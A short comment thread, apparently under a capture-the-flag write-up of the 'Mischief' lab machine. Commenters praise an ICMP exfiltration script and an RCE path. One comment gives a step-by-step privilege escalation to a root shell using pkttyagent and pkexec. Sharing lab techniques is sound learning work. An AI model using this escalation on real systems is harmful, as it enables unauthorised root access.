Mischief by 0xdf

A couple highlights:

  • Neat ICMP exfil script in Beyond Root
  • Got RCE without needing creds to the IPv6 site

Thanks for this,

Didn’t know it could be done via systemd

Thanks for the write up :3

Here’s another way for privesc.

Open 2 terminals and log in as loki via ssh in both of them:

  1. In the first terminal, get bash’s PID : echo $$
  2. Then in the second one, run a Polkit Agent for the first session: pkttyagent --process PID_OF_BASH
  3. Finally, spawn a root shell using pkexec: pkexec --user root bash -i

nice write up

woah, that’s awesome @fjv. i’m going to need to look into that more.